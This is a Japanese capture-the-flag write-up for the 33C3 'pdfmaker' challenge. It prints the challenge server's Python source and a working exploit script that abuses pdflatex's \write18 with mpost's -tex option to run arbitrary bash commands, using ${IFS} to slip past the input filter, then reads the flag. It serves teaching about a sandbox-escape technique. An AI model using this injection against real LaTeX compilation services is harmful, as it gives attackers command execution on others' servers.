ユーザーがいくつかのファイルを記述し、pdflatexでコンパイルできるようにする小さなアプリケーションです 。 何が間違っている可能性がありますか?
nc 24242
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- import signal import sys from random import randint import os, pipes from shutil import rmtree from shutil import copyfile import subprocess class PdfMaker: def cmdparse(self, cmd): fct = { 'help': self.helpmenu, '?': self.helpmenu, 'create': self.create, 'show': self.show, 'compile': self.compilePDF, 'flag': self.flag }.get(cmd, self.unknown) return fct def handle(self): self.initConnection() print " Welcome to pdfmaker! Send '?' or 'help' to get the help. Type 'exit' to disconnect." instruction_counter = 0 while(instruction_counter < 77): try: cmd = (raw_input("> ")).strip().split() if len(cmd) < 1: continue if cmd[0] == "exit": self.endConnection() return print self.cmdparse(cmd[0])(cmd) instruction_counter += 1 except Exception, e: print "An Exception occured: ", e.args self.endConnection() break print "Maximum number of instructions reached" self.endConnection() def initConnection(self): cwd = os.getcwd() self.directory = cwd + "/tmp/" + str(randint(0, 2**60)) while os.path.exists(self.directory): self.directory = cwd + "/tmp/" + str(randint(0, 2**60)) os.makedirs(self.directory) flag = self.directory + "/" + "33C3" + "%X" % randint(0, 2**31) + "%X" % randint(0, 2**31) copyfile("flag", flag) def endConnection(self): if os.path.exists(self.directory): rmtree(self.directory) def unknown(self, cmd): return "Unknown Command! Type 'help' or '?' to get help!" def helpmenu(self, cmd): if len(cmd) < 2: return " Available commands: ?, help, create, show, compile.\n Type 'help COMMAND' to get information about the specific command." if (cmd[1] == "create"): return (" Create a file. Syntax: create TYPE NAME\n" " TYPE: type of the file. Possible types are log, tex, sty, mp, bib\n" " NAME: name of the file (without type ending)\n" " The created file will have the name NAME.TYPE") elif (cmd[1] == "show"): return (" Shows the content of a file. Syntax: show TYPE NAME\n" " TYPE: type of the file. Possible types are log, tex, sty, mp, bib\n" " NAME: name of the file (without type ending)") elif (cmd[1] == "compile"): return (" Compiles a tex file with the help of pdflatex. Syntax: compile NAME\n" " NAME: name of the file (without type ending)") def show(self, cmd): if len(cmd) < 3: return " Invalid number of parameters. Type 'help show' to get more info." if not cmd[1] in ["log", "tex", "sty", "mp", "bib"]: return " Invalid file ending. Only log, tex, sty and mp allowed" filename = cmd[2] + "." + cmd[1] full_filename = os.path.join(self.directory, filename) full_filename = os.path.abspath(full_filename) if full_filename.startswith(self.directory) and os.path.exists(full_filename): with open(full_filename, "r") as file: content = file.read() else: content = "File not found." return content def flag(self, cmd): pass def create(self, cmd): if len(cmd) < 3: return " Invalid number of parameters. Type 'help create' to get more info." if not cmd[1] in ["log", "tex", "sty", "mp", "bib"]: return " Invalid file ending. Only log, tex, sty and mp allowed" filename = cmd[2] + "." + cmd[1] full_filename = os.path.join(self.directory, filename) full_filename = os.path.abspath(full_filename) if not full_filename.startswith(self.directory): return "Could not create file." with open(full_filename, "w") as file: print "File created. Type the content now and finish it by sending a line containing only '\q'." while 1: text = raw_input(""); if text.strip("\n") == "\q": break write_to_file = True; for filter_item in ("..", "*", "/", "\\x"): if filter_item in text: write_to_file = False break if (write_to_file): file.write(text + "\n") return "Written to " + filename + "." def compilePDF(self, cmd): if (len(cmd) < 2): return " Invalid number of parameters. Type 'help compile' to get more info." filename = cmd[1] + ".tex" full_filename = os.path.join(self.directory, filename) full_filename = os.path.abspath(full_filename) if not full_filename.startswith(self.directory) or not os.path.exists(full_filename): return "Could not compile file." compile_command = "cd " + self.directory + " && pdflatex " + pipes.quote(full_filename) compile_result = subprocess.check_output(compile_command, shell=True) return compile_result def signal_handler_sigint(signal, frame): print 'Exiting...' pdfmaker.endConnection() sys.exit(0) if __name__ == "__main__": signal.signal(signal.SIGINT, signal_handler_sigint) pdfmaker = PdfMaker() pdfmaker.handle()
スクリプトを学習した後、 pdflatexを扱っていることが明らかになります。 Googleのクイック検索では、最近の脆弱性を説明する記事へのリンクが提供されます。 また、必要なフラグが33C3で始まり 、その後ランダムシーケンスになることも確認します。
#!/usr/bin/python3 import socket def send(cmd): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("", 24242)) x = '''verbatimtex \documentclass{minimal}\begin{document} etex beginfig (1) label(btex blah etex, origin); endfig; \end{document} bye \q ''' s.send('create mp x\n'.encode()) s.send(x.encode()) s.send('create tex test\n'.encode()) test = '''\documentclass{article}\begin{document} \immediate\write18{mpost -ini "-tex=bash -c (%s)>flag.tex" "x.mp"} \end{document} \q ''' %(cmd) s.sendall(test.encode()) s.send('compile test\n'.encode()) s.send('show tex flag\n'.encode()) data = s.recv(90240) data = data.decode() s.close() return data while True: cmd = input('> ') cmd = cmd.replace(' ','${IFS}') print(send(cmd))
開始後、スラッシュ文字が正しく処理されず、それが存在するコマンドが実行されないことが判明しました。 シェルがあり、コマンドでフラグを表示します:
ls | grep 33 | xargs cat
